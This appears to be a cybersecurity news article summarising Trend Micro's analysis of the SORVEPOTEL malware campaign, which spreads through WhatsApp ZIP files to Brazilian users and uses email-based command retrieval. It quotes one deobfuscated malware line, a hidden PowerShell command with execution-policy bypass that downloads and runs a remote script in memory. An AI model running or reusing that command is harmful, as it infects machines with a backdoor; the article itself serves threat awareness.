Water Saci Hackers Leverage WhatsApp to Deliver Multi-Vector Persistent SORVEPOTEL Malware

A sophisticated malware campaign targeting Brazilian users has emerged with alarming capabilities.

The Water Saci campaign, identified by Trend Micro analysts as leveraging the SORVEPOTEL malware, exploits WhatsApp as its primary distribution vector for rapid propagation across victim networks.

First identified in September 2025, the campaign evolved dramatically by October 2025, introducing a new script-based attack chain that diverges significantly from previously observed .NET-based methods.

The malware demonstrates remarkable resilience through multi-vector persistence mechanisms and advanced command-and-control infrastructure that grants attackers unprecedented real-time operational control over compromised systems.

Trend Micro analysts identified that the campaign automatically distributes malicious ZIP files to all contacts and groups associated with compromised WhatsApp accounts, creating exponential spread potential.

On October 8, 2025, researchers revealed file downloads originating from WhatsApp web sessions, specifically identifying files named Orcamento-2025*.zip.

Rather than employing traditional .NET binaries, the evolved chain orchestrates payload delivery through a combination of Visual Basic Script downloaders and PowerShell scripts, facilitating fileless execution that evades conventional security detection methods.

The infection mechanism begins when users download and extract malicious ZIP archives containing an obfuscated VBS downloader named Orcamento.vbs.

This component executes a PowerShell command that performs fileless execution via New-Object Net.WebClient, downloading and executing the PowerShell script tadeu.ps1 directly in memory.

The deobfuscated code reveals:-

shell. Run "powershell -ep bypass ""[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;iex ((New-Object Net.WebClient).DownloadString('https://cld.pt/dl/download/ac23c304-aa9d-4d27-a845-272ec4de533d/sapotransfer-640a60194938bL1/tadeu.ps1?download=true'))"", 0, True

Email-Based Command Infrastructure and Advanced Persistence

The SORVEPOTEL backdoor implements a sophisticated dual-channel communication architecture that fundamentally distinguishes it from conventional banking trojans.

Rather than relying on traditional HTTP-based command-and-control systems, the malware leverages IMAP connections to terra.com.br email accounts using hardcoded credentials to retrieve operational commands.

This email-based infrastructure provides remarkable resilience, allowing threat actors to maintain control even when primary C&C servers face disruption.

Upon establishing persistence through registry modifications and scheduled task creation using WinManagers.vbs in C:\ProgramData\WindowsManager\, the backdoor queries email inboxes every thirty minutes to extract multiple types of URLs including primary data endpoints, backup infrastructure URLs, and PowerShell payload delivery links.

The malware employs an HTTP-based polling system as its secondary communication channel, sending POST requests to extracted C&C servers every five seconds with the action parameter get_commands.

This multi-layered approach ensures operators can pause, resume, and monitor campaign activity in real time, effectively converting infected machines into a coordinated botnet.

The backdoor executes over twenty distinct commands, ranging from system information gathering and process management to screenshot capture, file operations, and system power control, granting attackers comprehensive remote access capabilities that position SORVEPOTEL as a full-featured backdoor with sophisticated operational flexibility and devastating potential for financial institutions and enterprises across Brazil.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.